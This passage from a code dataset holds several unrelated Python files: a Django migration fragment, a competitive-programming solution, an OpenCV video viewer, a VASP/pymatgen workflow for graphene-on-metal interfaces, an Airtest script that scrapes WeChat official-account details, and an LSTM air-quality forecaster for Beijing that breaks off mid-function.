serialize=False, verbose_name=b'ID')),\n (\n b'created_at', models.DateTimeField(auto_now_add=True, null=True)),\n (\n b'updated_at', models.DateTimeField(auto_now=True, null=True)),\n (\n b'client', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'server', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'request', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'response', jsonfield.fields.JSONField(blank=True, default={}, null=True)),\n (\n b'name', models.CharField(blank=True, max_length=256, null=True)),\n (\n b'user', models.ForeignKey(db_constraint=False, null=True, on_delete=django.db.models.deletion.CASCADE, related_name=b'httplogs', to=settings.AUTH_USER_MODEL))], options={b'db_table': b'httplog'})]","sub_path":"pycfiles/httplog-1.2.0/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"385133889","text":"from itertools import product\n\nn = int(input())\nal = []\n\nfor _ in range(n):\n curr_al = []\n a = int(input())\n for i in range(a):\n x,y = map(int, input().split())\n curr_al.append((x,y))\n al.append(curr_al)\n\n\npattern = 2\nite = product(range(pattern),repeat=n)\nans = 0\nfor it in ite:\n a_01_l = list(it)\n curr_ans = a_01_l.count(1)\n # print('-----')\n # print(a_01_l)\n for i, curr_it in enumerate(it):\n if curr_it == 1:\n check = True\n for a in al[i]:\n if a_01_l[a[0]-1] != a[1]:\n check = False\n if not check:\n break\n else:\n # print('ok')\n ans = max(curr_ans,ans)\n\nprint(ans)\n","sub_path":"2_kakomon/abc126-211/abc147_c.py","file_name":"abc147_c.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"335671971","text":"import cv2\n\ncap = cv2.VideoCapture('C:/Users/16276/Desktop/aaa.mp4')\n\nprint(cap.isOpened())\ncap.open(0)\nwhile True:\n ret,frame = cap.read()\n print(ret)\n\n cv2.imshow('d',frame)\n if cv2.waitKey(5)&0xFF==ord('q'):\n break\n\ncap.release()\ncv2.destroyAllWindows()","sub_path":"ML_01/xupengopencv/simply.py","file_name":"simply.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"251856321","text":"from __future__ import division, unicode_literals, print_function\n\nimport os\nimport sys\nimport time\nfrom math import sqrt\nfrom collections import OrderedDict\n\nfrom pymatgen.io.vasp.inputs import Incar, Poscar\nfrom pymatgen.io.vasp.inputs import Potcar, Kpoints\nfrom pymatgen.core.structure import Structure\nfrom pymatgen.symmetry.analyzer import SpacegroupAnalyzer\n\nfrom custodian.vasp.handlers import VaspErrorHandler\n#from custodian.vasp.handlers import FrozenJobErrorHandler\n#from custodian.vasp.handlers import MeshSymmetryErrorHandler\n#from custodian.vasp.handlers import NonConvergingErrorHandler \n\nfrom mpinterfaces import get_struct_from_mp\nfrom mpinterfaces.interface import Interface\nfrom mpinterfaces.calibrate import Calibrate, CalibrateSlab\nfrom mpinterfaces.transformations import *\nfrom mpinterfaces.utils import *\n\n\n# default incar settings, with vdw\nincar_dict = dict(\n PREC = 'Accurate',\n ENCUT = 400,\n ISMEAR = 0,\n EDIFF = '1E-6',\n ISIF = 3,\n IBRION = 2,\n NSW = 500,\n NPAR = 4,\n LCHARG = '.FALSE.',\n GGA = 'BO',\n PARAM1 = 0.1833333333,\n PARAM2 = 0.2200000000,\n LUSE_VDW = '.TRUE.',\n AGGAC = 0.0000 )\n# INCAR\nincar_sub = Incar.from_dict(incar_dict)\nincar_sub['ISMEAR'] = 1\nincar_2d = Incar.from_dict(incar_dict)\n# KPOINTS\nkpoints_sub = Kpoints.monkhorst_automatic(kpts=(18, 18, 18))\nkpoints_2d = Kpoints.monkhorst_automatic(kpts=(18, 18, 1))\n# QUE\nnprocs = 32\nnnodes = 1\nmem='1000'\nwalltime = '24:00:00'\nbin_sub = '/home/km468/Software/VASP/vasp.5.3.5/vasp'\nbin_2d = '/home/km468/Software/VASP/vasp.5.3.5/vasp_noz'\n# STRUCTURES\nsubstrates = [ 'Pt', 'Ag', 'Cu', 'Ni', 'Al' , 'Au', 'Pd', 'Ir']\nmat2ds = ['POSCAR_graphene']\n\n\ndef run_cal(turn_knobs, qadapter, job_cmd, job_dir, name,\n incar=None, poscar=None, potcar=None, kpoints=None):\n \"\"\"\n setup and run calibrate job\n \"\"\"\n Calibrate.LOG_FILE = name+'.json'\n cal = Calibrate(incar, poscar, potcar, kpoints, \n turn_knobs=turn_knobs, qadapter=qadapter,\n job_cmd = job_cmd, job_dir=job_dir)\n cal.setup()\n cal.run()\n\n \ndef step1():\n \"\"\"\n get substrate bulk structures from materialsproject for\n Pt, Ag, Cu, Ni, Al, Au, Pd, Ir and do 3d relaxation(ISIF=3)\n \n get 2d structures from the provided poscars(just poscar_graphene)\n and relax in x and y only(vasp_noz bin)\n \n - POSCAR_graphene must be made available in the directory\n - creates required input files and submits the jobs to the que\n - 8 + 1 jobs\n - returns: step1_sub.json step1_2d.json \n \"\"\"\n #job directory for the runs\n job_dir_sub = 'step1_sub'\n job_dir_2d = 'step1_2d'\n # create list of all substrate poscars\n poscars_sub = []\n poscars_2d = []\n # substrate structures\n for sub in substrates:\n struct_sub = get_struct_from_mp(sub)\n sa_sub = SpacegroupAnalyzer(struct_sub)\n struct_sub = sa_sub.get_conventional_standard_structure()\n poscars_sub.append(Poscar(struct_sub))\n # 2d structures\n for td in mat2ds:\n poscars_2d.append(Poscar.from_file(td))\n # setup calibrate and run'em\n turn_knobs_sub = OrderedDict(\n [\n ('POSCAR', poscars_sub)\n ])\n turn_knobs_2d = OrderedDict(\n [\n ('POSCAR', poscars_2d)\n ])\n # normal binary\n qadapter_sub, job_cmd_sub = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_sub, mem=mem)\n # binary with z constraint\n qadapter_2d, job_cmd_2d = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_2d, mem=mem)\n run_cal(turn_knobs_sub, qadapter_sub, job_cmd_sub, job_dir_sub,\n 'step1_sub', incar=incar_sub, kpoints=kpoints_sub)\n run_cal(turn_knobs_2d, qadapter_2d, job_cmd_2d, job_dir_2d,\n 'step1_2d', incar=incar_2d, kpoints=kpoints_2d)\n return ['step1_sub.json', 'step1_2d.json']\n\n\ndef step2():\n \"\"\"\n read in the realxed bulk substrates and relaxed 2d,\n create substrate slab,\n get aligned substrates and 2d,\n relax the aligned structures seperatly(only ionic positions, ISIF=2)\n\n - input from step1_sub.json and step1_2d.json\n - 8(pairs) * 2 = 16 jobs\n - returns step2.json\n \"\"\"\n nlayers_2d = 1\n nlayers_sub = 2\n hkl_sub = [1,1,1]\n min_thick = 10.0\n min_vac = 18.0\n hkl_2d = [0,0,1]\n #job directory for the runs\n job_dir_sub = 'step2_sub'\n job_dir_2d = 'step2_2d'\n # isif = 2\n incar_sub['ISIF'] = 2\n incar_2d['ISIF'] = 2\n # kpoints\n kpoints_sub = Kpoints.monkhorst_automatic(kpts=(18, 18, 1))\n kpoints_2d = Kpoints.monkhorst_automatic(kpts=(18, 18, 1)) \n # CSL settings for each substrate\n alignment_settings = { 'Pt': [120, 0.10, 1, 0.5],\n 'Ag': [120, 0.10, 1, 0.5],\n 'Al': [120, 0.10, 1, 0.5],\n 'Au': [120, 0.10, 1, 0.5],\n 'Pd': [120, 0.10, 1, 0.5],\n 'Ir': [120, 0.10, 1, 0.5],\n 'Cu': [50, 0.06, 1, 0.5],\n 'Ni': [50, 0.06, 1, 0.5] }\n # load in previous jobs\n relaxed_sub_jobs = Calibrate.jobs_from_file('step1_sub.json')\n relaxed_2d_jobs = Calibrate.jobs_from_file('step1_2d.json')\n poscars_sub = []\n poscars_2d = []\n # create list of all aligned substrate and 2d slabs\n for jsub in relaxed_sub_jobs:\n jdir = os.path.join(jsub.parent_job_dir, jsub.job_dir)\n contcar_file = os.path.join(jdir, 'CONTCAR')\n relaxed_struct_sub = Structure.from_file(contcar_file)\n # create slab\n slab_sub = Interface(relaxed_struct_sub, hkl = hkl_sub,\n min_thick = min_thick, min_vac = min_vac,\n primitive = False, from_ase = True)\n species_sub = ''.join([tos.symbol for tos in slab_sub.types_of_specie])\n # loop over 2d\n for j2d in relaxed_2d_jobs: \n jdir = os.path.join(j2d.parent_job_dir, j2d.job_dir)\n contcar_file = os.path.join(jdir, 'CONTCAR')\n slab_2d = slab_from_file(hkl_2d, contcar_file)\n species_2d = ''.join([tos.symbol for tos in slab_2d.types_of_specie])\n # align\n slab_sub_aligned, slab_2d_aligned = get_aligned_lattices(\n slab_sub,\n slab_2d,\n *alignment_settings[species_sub])\n # aligned sub poscar\n sd_flags = CalibrateSlab.set_sd_flags(interface=slab_sub_aligned,\n n_layers=nlayers_sub)\n poscar = Poscar(slab_sub_aligned, selective_dynamics=sd_flags)\n poscar.comment = '_'.join([species_sub,species_2d,'sub']) \n poscars_sub.append(poscar)\n # aligned 2d slab\n sd_flags = CalibrateSlab.set_sd_flags(interface=slab_2d_aligned,\n n_layers=nlayers_2d)\n poscar = Poscar(slab_2d_aligned, selective_dynamics=sd_flags)\n poscar.comment = '_'.join([species_sub,species_2d,'2d'])\n poscars_2d.append(poscar)\n # setup calibrate and run'em\n turn_knobs_sub = OrderedDict(\n [\n ('POSCAR', poscars_sub)\n ])\n turn_knobs_2d = OrderedDict(\n [\n ('POSCAR', poscars_2d)\n ])\n qadapter, job_cmd = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_sub, mem=mem)\n run_cal(turn_knobs_sub, qadapter, job_cmd, job_dir_sub,\n 'step2_sub', incar=incar_sub, kpoints=kpoints_sub)\n run_cal(turn_knobs_2d, qadapter, job_cmd, job_dir_2d,\n 'step2_2d', incar=incar_2d, kpoints=kpoints_2d)\n return ['step2_sub.json', 'step2_2d.json']\n\n\ndef step3():\n \"\"\"\n put aligned & relaxed 2d materials in all possible ways on the\n aligned & relaxed slab,\n relax interface ionic positions(ISIF=2)\n\n - uses info from step2_sub.json and step2_2d.json\n - creates required input files and submits the jobs to the que\n - 8(pairs) * 2(atoms in graphene basis) = 16 jobs\n - returns: step3.json \n \"\"\"\n seperation = 3 # in angstroms\n nlayers_2d = 1\n nlayers_sub = 2\n hkl_sub = [1,1,1]\n hkl_2d = [0,0,1]\n #job directory for the runs\n name = 'step3' \n job_dir = 'step3'\n # incar\n incar = Incar.from_dict(incar_dict)\n incar['ISMEAR'] = 1\n incar['ISIF'] = 2\n # kpoints\n kpoints = Kpoints.monkhorst_automatic(kpts=(18, 18, 1))\n # load in previous jobs\n relaxed_sub_jobs = Calibrate.jobs_from_file('step2_sub.json')\n relaxed_2d_jobs = Calibrate.jobs_from_file('step2_2d.json')\n # create list of all substrate poscars\n all_poscars = []\n # loop over aligned & relaxed substrates and 2d\n for jsub, j2d in zip(relaxed_sub_jobs,relaxed_2d_jobs):\n # substrate\n job_dir_sub = os.path.join(jsub.parent_job_dir, jsub.job_dir)\n contcar_file = os.path.join(job_dir_sub, 'CONTCAR')\n # read in as structure object\n substrate_slab_aligned = Structure.from_file(contcar_file)\n species_sub = ''.join([tos.symbol for tos in substrate_slab_aligned.types_of_specie])\n # 2d\n job_dir_2d = os.path.join(j2d.parent_job_dir, j2d.job_dir)\n contcar_file = os.path.join(job_dir_2d, 'CONTCAR')\n # read in as structure object \n mat2d_slab_aligned = Structure.from_file(contcar_file)\n species_2d = ''.join([tos.symbol for tos in mat2d_slab_aligned.types_of_specie])\n # position the aligned materials in all possible ways\n hetero_interfaces = generate_all_configs(mat2d_slab_aligned,\n substrate_slab_aligned,\n nlayers_2d,\n nlayers_sub,\n seperation )\n # loop over all hetero-interfaces\n for i, iface in enumerate(hetero_interfaces):\n sd_flags = CalibrateSlab.set_sd_flags(interface=iface,\n n_layers=nlayers_2d+nlayers_sub,\n top=True, bottom=False)\n poscar = Poscar(iface, selective_dynamics=sd_flags)\n poscar.comment = '_'.join([species_sub,species_2d,str(i)])\n all_poscars.append(poscar)\n # setup calibrate and run'em\n turn_knobs = OrderedDict(\n [\n ('POSCAR', all_poscars)\n ])\n qadapter, job_cmd = get_run_cmmnd(nnodes=nnodes, nprocs=nprocs,\n walltime=walltime,\n job_bin=bin_sub, mem=mem)\n run_cal(turn_knobs, qadapter, job_cmd, job_dir,\n name, incar=incar, kpoints=kpoints)\n return [name+'.json']\n\n\nif __name__ == '__main__':\n # functions will be run in the order given in the list\n steps = [step1, step2, step3]\n error_handlers = [VaspErrorHandler()]\n # update interval\n interval = 300\n Calibrate.launch_daemon(steps, interval, error_handlers)\n","sub_path":"examples/workflows/graphene_on_metal.py","file_name":"graphene_on_metal.py","file_ext":"py","file_size_in_byte":11344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"320750209","text":"# -*- encoding=utf8 -*-\n__author__ = \"Administrator\"\nimport itertools\nimport traceback\n\nfrom airtest.core.api import *\nfrom poco.drivers.android.uiautomation import AndroidUiautomationPoco\nimport redis\nimport pymongo\nimport pandas as pd\n\nimport helper\n\n\nclass AirTestSpider:\n \"\"\"\n airtest 抓取文本信息和触发点击事件,mitmproxy 抓取相关网络信息,通过 redis 通信\n \"\"\"\n\n def __init__(self, device_host):\n auto_setup(__file__)\n\n self.device_1 = connect_device(f'android:///{device_host}?cap_method=javacap&touch_method=adb')\n self.device_name = 'xiaoyao'\n self.poco = AndroidUiautomationPoco(self.device_1, screenshot_each_action=False)\n\n self.client = pymongo.MongoClient()\n self.dp_db = self.client['DianPing']\n\n self.wechat_db = self.client['WeChatOfficialAccount']\n self.wechat_col = self.wechat_db['wechat_search_info']\n self.pandas_col = self.wechat_db['pandas_info']\n\n self.redis_cli = redis.StrictRedis(decode_responses=True)\n self.biz_queue = f'{self.device_name}_wechat_biz'\n self.url_queue = f'{self.device_name}_article_url'\n\n self.wx_package_name = 'com.tencent.mm'\n self.city_en_list = ['guangzhou', 'dongguan', 'foshan', 'huizhou', 'zhongshan', 'zhuhai']\n\n self.count = 0\n\n def to_search_entrance(self):\n \"\"\"\n 进入微信搜索入口\n :return:\n \"\"\"\n try:\n # 点击首页搜索图标\n self.poco(\"com.tencent.mm:id/jb\").click()\n # 搜索项选择公众号\n self.poco(text=\"公众号\").click()\n except Exception as e:\n print('进入搜索入口失败')\n traceback.print_exc()\n\n def get_item_info(self, keyword):\n \"\"\"\n 获取搜索的公众号基础信息,不包括 biz 和 第一篇文章 url\n :param keyword:\n :return:\n \"\"\"\n # 清空输入框\n self.poco(\"com.tencent.mm:id/l3\").set_text('')\n # 点击输入框\n self.poco(\"com.tencent.mm:id/l3\").click()\n # 输入关键词\n text(keyword, search=True)\n sleep(3)\n # 出现微信推荐搜索时,点击进入仍然搜索页面\n still_search_button = self.poco(nameMatches='.*?仍然搜索.*?')\n if still_search_button.exists():\n print('进入点击')\n still_search_button.click()\n # 搜集搜索项\n nodes = self.poco(name=\"搜一搜\").children()\n if len(nodes) > 2:\n item_info_dict = self.parse_nodes(nodes)\n return item_info_dict\n\n @staticmethod\n def parse_nodes(nodes):\n \"\"\"\n :param nodes:\n :return:\n \"\"\"\n # compress 过滤出迭代元素中 True 的元素\n search_result = itertools.compress(nodes, [node.attr('touchable') for node in nodes])\n search_result = [i.get_name() for i in search_result][1:]\n for i in search_result:\n # 去除干扰项\n if i in ['正在搜索', '没有更多的搜索结果', '3f5d81b43a891e3abe270d49cd6ce850']:\n search_result.remove(i)\n dic_list = helper.parse_search_list(search_result)\n return dic_list[0]\n\n def click_article(self):\n \"\"\"\n 点击公众号和首条文章\n :return:\n \"\"\"\n # 点击第一个搜索项\n # self.poco(\"android.webkit.WebView\").child('搜一搜').child('android.view.View')[0].click()\n self.poco(\"搜一搜\").children()[1].click()\n # 验证公众号是否包含一篇及以上文章\n article = self.poco('com.tencent.mm:id/b3q')\n biz, article_url = '', ''\n if article.exists():\n article.click()\n sleep(2)\n biz = self.from_redis_get_info(self.biz_queue)\n article_url = self.from_redis_get_info(self.url_queue)\n if biz is None:\n print('找不到 biz ,请查看具体情况')\n else:\n # blpop 取出来是一个元祖,需取第一个元素\n biz = biz[1]\n article_url = article_url[1]\n sleep(0.5)\n # 点击关闭文章按钮\n self.poco(\"com.tencent.mm:id/kx\").click()\n kf = self.poco(\"com.tencent.mm:id/kf\")\n if kf.exists():\n kf.click()\n else:\n self.poco(\"com.tencent.mm:id/kx\").click()\n return biz, article_url\n\n def from_redis_get_info(self, name):\n info = self.redis_cli.blpop(name, timeout=3)\n return info\n\n def restart_app_to_search(self):\n stop_app(self.wx_package_name)\n start_app(self.wx_package_name)\n sleep(3)\n self.to_search_entrance()\n\n def inspect_current_page(self):\n \"\"\"\n 检测当前页面\n :return:\n \"\"\"\n if self.poco(\"当前所在页面,与的聊天\").exists():\n print('现在 app 在首页位置,准备进入搜索入口')\n self.to_search_entrance()\n elif self.poco(\"当前所在页面,搜一搜\").exists():\n print('现在 app 在搜索入口,准备进行搜索')\n elif self.poco('com.tencent.mm:id/b1o').exists():\n print('现在在公众号信息页面,准备返回搜索入口')\n self.poco(\"com.tencent.mm:id/kb\").click()\n else:\n print('app 页面未检测到,准备重启')\n self.restart_app_to_search()\n return\n\n def search_and_click(self, name):\n \"\"\"\n 完整流程\n :param name:\n :return:\n \"\"\"\n print('准备搜索公众号: ', name)\n try:\n item_info_dic = self.get_item_info(name)\n if item_info_dic:\n # 保存搜索名字\n item_info_dic['search_name'] = name\n biz, article_url = self.click_article()\n if biz and article_url:\n item_info_dic['biz'] = biz\n item_info_dic['article_url'] = article_url\n else:\n item_info_dic = {'search_name': name}\n return item_info_dic\n except Exception as e:\n traceback.print_exc()\n self.inspect_current_page()\n\n def mongo_run(self):\n self.inspect_current_page()\n\n for city_en in self.city_en_list:\n col = self.dp_db[f'dp_{city_en}_mall']\n mall_names = [mall.get('fullName') for mall in list(col.find())]\n for mall_name in mall_names:\n mall_wechat_info = self.wechat_col.find_one({'search_name': mall_name})\n if mall_name and not mall_wechat_info:\n\n # if self.count == 200:\n # self.count = 0\n # time.sleep(3600)\n # else:\n # self.count += 1\n\n item_info_dic = self.search_and_click(mall_name)\n if item_info_dic:\n print(item_info_dic)\n self.wechat_col.update_one({'search_name': item_info_dic['search_name']}, {'$set': item_info_dic}, True)\n\n print('数据抓取结束')\n\n def pandas_run_help(self, data):\n if self.pandas_col.find_one({'微信': data['微信']}):\n return\n item_info_dic = self.search_and_click(data['微信'])\n if item_info_dic:\n data['gzh_id'] = item_info_dic.get('biz')\n data['wechat_name'] = item_info_dic.get('wechat_name')\n data['wechat_url'] = item_info_dic.get('article_url')\n self.pandas_col.update_one({'微信': data['微信']}, {'$set': data.to_dict()}, True)\n print(data.to_dict())\n return\n\n def pandas_run(self):\n path = r'C:Users\\Administrator\\Desktop\\test_brand.xls'\n df = pd.read_excel(path)\n df.apply(lambda x: self.pandas_run_help(x), axis=1)\n\n def test_run(self):\n # 测试出现任然搜索的情况\n self.search_and_click('beceas')\n\n\ndef main():\n device_host = '127.0.0.1:21503'\n air_spider = AirTestSpider(device_host)\n air_spider.mongo_run()\n # air_spider.pandas_run()\n # air_spider.test_run()\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"xiaoyao_simulator/airtest_xiaoyao_phone.py","file_name":"airtest_xiaoyao_phone.py","file_ext":"py","file_size_in_byte":8239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"641733905","text":"\"\"\"\r\nKDD Cup 2018 Fresh Air\r\n:training: Beijing historical data\r\n\"\"\"\r\n\r\nfrom math import sqrt\r\nfrom pandas import read_csv\r\nfrom matplotlib import pyplot\r\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\r\nfrom sklearn.metrics import mean_squared_error, mean_absolute_error, r2_score\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense, LSTM, Dropout\r\n\r\nimport datetime as dt\r\nimport pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nimport lstm_data as ld\r\nimport build_test_data as bt\r\nimport submit\r\n\r\ndebug = True\r\ndesired_width = 250\r\npd.set_option('display.width', desired_width)\r\nnp.set_printoptions(linewidth=desired_width)\r\n\r\ndef show_dataframe(df, head=5):\r\n if head > 0:\r\n print('------------- Head({}) --------------'.format(head))\r\n print(df.head(head))\r\n\r\n print('------------- Columns -----------------')\r\n for col in df.columns.tolist():\r\n if df[col].dtype in ['float32', 'int32', 'float64', 'int64']:\r\n print(' {:15s} = {:10.3f} ~ {:10.3f}, NaN = {}'.format(col, df[col].min(), df[col].max(), df[col].isnull().sum()))\r\n\r\n\r\ndef load_historical_data(file='data/Beijing_historical_data.csv', include_weather=False):\r\n \"\"\" Attribute Information: (input)\r\n original w/o stationid --> reorder for predict\r\n :stationid: station id (0) string\r\n :weekofday: (0) inserted (0) weekofday\r\n :time: date format (1) datetime (1) HH only (1) HH\r\n :temperature: real (2) real (2) (2) PM25 --> Predict\r\n :pressure: real (3) real (3) (3) PM10 --> Predict\r\n :humidity: real (4) real (4) (4) O3 --> Predict\r\n :winddirection: real (5) real (5) (5) NO2 --> Predict\r\n :windspeedkph: real (6) real (6) (6) CO --> Predict\r\n :PM25: real (7) real (7) => predict =(-6) (7) SO2 --> Predict\r\n :PM10: real (8) real (8) => predict =(-5) (8) temperature\r\n :NO2: real (9) real (9) => predict =(-4) (9) pressure\r\n :CO: real (10) real (10) => predict =(-3) (10) humidity\r\n :O3: real (11) real (11) => predict =(-2) (11) winddirection\r\n :SO2: real (12) real (12) => predict =(-1) (12) windspeed\r\n \"\"\"\r\n\r\n if not os.path.exists(file):\r\n ValueError(\"file Not found {}\".format(file))\r\n return\r\n\r\n # load dataset\r\n if include_weather:\r\n column_list = ['stationid', 'time', 'temperature', 'pressure', 'humidity',\r\n 'winddirection', 'windspeed', 'weather', 'PM25', 'PM10', 'NO2', 'CO', 'O3', 'SO2']\r\n else:\r\n column_list = ['stationid', 'time', 'temperature', 'pressure', 'humidity',\r\n 'winddirection', 'windspeed', 'PM25', 'PM10', 'NO2', 'CO', 'O3', 'SO2']\r\n\r\n df = read_csv(file, parse_dates=['time'], header=0, names=column_list)\r\n\r\n # generate new column 'weekday' from datetime\r\n df['weekday'] = df['time'].dt.dayofweek\r\n\r\n # use only HH (daytime hour)\r\n df['time'] = df['time'].dt.hour\r\n\r\n # reorder\r\n # (stationid=1) + (utctime=0) + (weekday=-1) + ...\r\n if include_weather:\r\n reordered_list = ['stationid', 'time', 'weekday', 'PM25', 'PM10', 'O3', 'NO2', 'CO', 'SO2',\r\n 'temperature', 'pressure', 'humidity', 'winddirection', 'windspeed', 'weather']\r\n else:\r\n reordered_list = ['stationid', 'time', 'weekday', 'PM25', 'PM10', 'O3', 'NO2', 'CO', 'SO2',\r\n 'temperature', 'pressure', 'humidity', 'winddirection', 'windspeed']\r\n\r\n df = df[reordered_list]\r\n\r\n # mark all NA values with previous record value (ffill)\r\n df.replace(999017.0, np.nan, inplace=True)\r\n df.replace(999999.0, np.nan, inplace=True)\r\n df.fillna(method='ffill', inplace=True)\r\n\r\n # drop left NaN\r\n df.dropna(inplace=True)\r\n\r\n # show dataFrame shortly\r\n # if debug:\r\n # show_dataframe(df, 5)\r\n\r\n # n_features, n_ignore (last 5 attributes)\r\n n_features = len(df.columns.tolist()) - 1\r\n n_ignore = 5\r\n\r\n return df, n_features, n_ignore\r\n\r\n\r\ndef reframed_for_lstm(df, n_steps=6, n_features=13, n_ignore=5, include_weather=False):\r\n # get list of stations\r\n stations = df['stationid'].unique()\r\n if debug:\r\n print('reframed for LSTM')\r\n print('n_features = {}'.format(n_features))\r\n print('target {} stations: {}'.format(len(stations), stations))\r\n\r\n data = [ ]\r\n i = 0\r\n for station in stations:\r\n if debug and i == 0:\r\n print('#{}: station = {}'.format(i, station))\r\n\r\n df1 = df[df['stationid'] == station]\r\n df1 = df1.drop(columns=df1.columns[0], axis=1)\r\n\r\n if debug and i == 0:\r\n print('Shape = {}, Columns = {}'.format(df1.shape, df1.columns.tolist()))\r\n\r\n # integer encode weather (non integer/float type)\r\n if include_weather:\r\n encoder = LabelEncoder()\r\n df1.loc[:, 'weather'] = encoder.fit_transform(df1.loc[:, 'weather'])\r\n\r\n # ensure all data is float\r\n values = df1.values\r\n values = values.astype('float64')\r\n\r\n if debug and i == 0:\r\n dd = pd.DataFrame(values)\r\n print('before scaled = shape {}'.format(dd.shape))\r\n #print(dd.head(100))\r\n #print(dd.tail(200))\r\n #print('station: {} -> {}'.format(station, values[1, :]))\r\n\r\n # normalize features\r\n scaler = MinMaxScaler(feature_range=(0, 1))\r\n scaler.fit(values)\r\n scaled = scaler.transform(values)\r\n\r\n # frame as supervised learning\r\n if debug and i == 0:\r\n dd = pd.DataFrame(scaled)\r\n print('scaled columns = #{} -> {}'.format(len(dd.columns.tolist()), dd.columns.tolist()))\r\n\r\n reframed = ld.series_to_supervised(scaled, n_steps, 1)\r\n if debug and i == 0:\r\n print(\"after reframed = shape {}\".format(reframed.shape))\r\n #print(reframed.tail(5))\r\n\r\n # drop columns we don't want to predict (last utctime ~ weather)\r\n reframed.drop(reframed.columns[[range(-n_ignore, 0, 1)]], axis=1, inplace=True)\r\n if debug and i == 0:\r\n print('reframed columns = #{} -> {}'.format(len(reframed.columns.tolist()), reframed.columns.tolist()))\r\n print(\"after re-framed.drop = shape {}\".format(reframed.shape))\r\n #print(reframed.tail(5))\r\n\r\n item = {}\r\n item['station'] = station\r\n item['data'] = reframed\r\n item['scaler'] = scaler\r\n data.append(item)\r\n\r\n i += 1\r\n else:\r\n if debug:\r\n print('load {} stations data'.format(len(stations)))\r\n return data\r\n\r\n\r\nclass RNN_LSTM(object):\r\n def __init__(self, param_data, n_steps=6, n_features=13, n_ignore=5, n_nodes=50):\r\n self.n_steps = n_steps\r\n self.n_features = n_features\r\n self.n_ignore = n_ignore\r\n self.param_data = param_data\r\n self.station_name = param_data['station']\r\n\r\n self.loading_data(param_data, n_steps, n_features, n_ignore)\r\n self.n_nodes = n_nodes\r\n self.model = self.build_model()\r\n\r\n def loading_data(self, item, n_steps=6, n_features=13, n_ignore=5):\r\n #\r\n # split into train and test sets\r\n #\r\n values = item['data'].values\r\n n_train_hours = values.shape[0] - 24*2\r\n train = values[:n_train_hours, :]\r\n test = values[n_train_hours:, :]\r\n\r\n if debug:\r\n print('X: train = {}, test = {}'.format(train.shape, test.shape))\r\n\r\n # split into input and outputs\r\n n_obs = n_steps * n_features\r\n train_X, train_y = train[:, :n_obs], train[:, n_obs:]\r\n test_X, test_y = test[:, :n_obs], test[:, n_obs:]\r\n\r\n # reshape input to be 3D [samples, timesteps, features]\r\n train_X = train_X.reshape((train_X.shape[0], n_steps, n_features))\r\n test_X = test_X.reshape((test_X.shape[0], n_steps, n_features))\r\n if debug:\r\n print('Fetch: X_tr = {}, y_tr = {}, X_te = {}, y_te = {}'.format(train_X.shape, train_y.shape,\r\n test_X.shape, test_y.shape))\r\n\r\n self.name = item['station']\r\n self.scaler = item['scaler']\r\n self.X_tr = train_X\r\n self.y_tr = train_y\r\n self.X_te = test_X\r\n self.y_te = test_y\r\n\r\n def build_model(self):\r\n model = Sequential()\r\n if debug:\r\n print('LSTM_Model: LSTM node = {}, input_shape = ({}, {})'.format(self.n_nodes,\r\n self.X_tr.shape[1],\r\n self.X_tr.shape[2]))\r\n\r\n model.add(LSTM(self.n_nodes, input_shape=(self.X_tr.shape[1], self.X_tr.shape[2])))\r\n model.add(Dense(self.n_features-self.n_ignore))\r\n model.compile(loss='mae', optimizer='adam')\r\n\r\n if debug:\r\n model.summary()\r\n\r\n return model\r\n\r\n def build_model_v2(self):\r\n model = Sequential()\r\n if debug:\r\n print('LSTM_Model: LSTM node = {}, input_shape = ({}, {})'.format(self.n_nodes,\r\n self.X_tr.shape[1],\r\n self.X_tr.shape[2]))\r\n\r\n model.add(LSTM(self.n_nodes, input_shape=(self.X_tr.shape[1], self.X_tr.shape[2]), return_sequences=True))\r\n model.add(Dropout(0.2))\r\n model.add(LSTM(100, return_sequences=False))\r\n model.add(Dropout(0.2))\r\n model.add(Dense(self.n_features-self.n_ignore))\r\n model.compile(loss='mae', optimizer='adam')\r\n\r\n if debug:\r\n model.summary()\r\n\r\n return model\r\n\r\n def train(self, n_epochs=50, n_batch_size=72):\r\n history = self.model.fit(self.X_tr, self.y_tr,\r\n epochs=n_epochs,\r\n batch_size=n_batch_size,\r\n validation_data=(self.X_te, self.y_te),\r\n verbose=2, shuffle=False)\r\n return history\r\n\r\n def plot_train(self, history):\r\n pyplot.clf()\r\n pyplot.plot(history.history['loss'], label='train')\r\n pyplot.plot(history.history['val_loss'], label='test')\r\n pyplot.legend()\r\n pyplot.savefig('img/bj_{}_hist.png'.format(self.name))\r\n\r\n def plot_test(self, inv_y, inv_yhat, metrics):\r\n pyplot.clf()\r\n pyplot.figure(figsize=(9, 9))\r\n pyplot.suptitle('Station: %s, RMSE=%.3f, MAPE=%.3f, R2_Score=%.3f'%(self.name,\r\n metrics[0], metrics[1], metrics[2]))\r\n pollutants = ['PM2.5', 'PM10', 'O3', 'NO2', 'CO', 'SO2']\r\n i = 0\r\n for pollutant in pollutants:\r\n if i == 0:\r\n print('ax_plot_y : {}'.format(inv_y[:, i]))\r\n print('ax_plot_y^: {}'.format(inv_yhat[:, i]))\r\n ax = pyplot.subplot(3, 2, i+1)\r\n ax.plot(inv_y[:, i], label='y (label)')\r\n ax.plot(inv_yhat[:, i], label='^y (predict)')\r\n ax.set_title(pollutant)\r\n 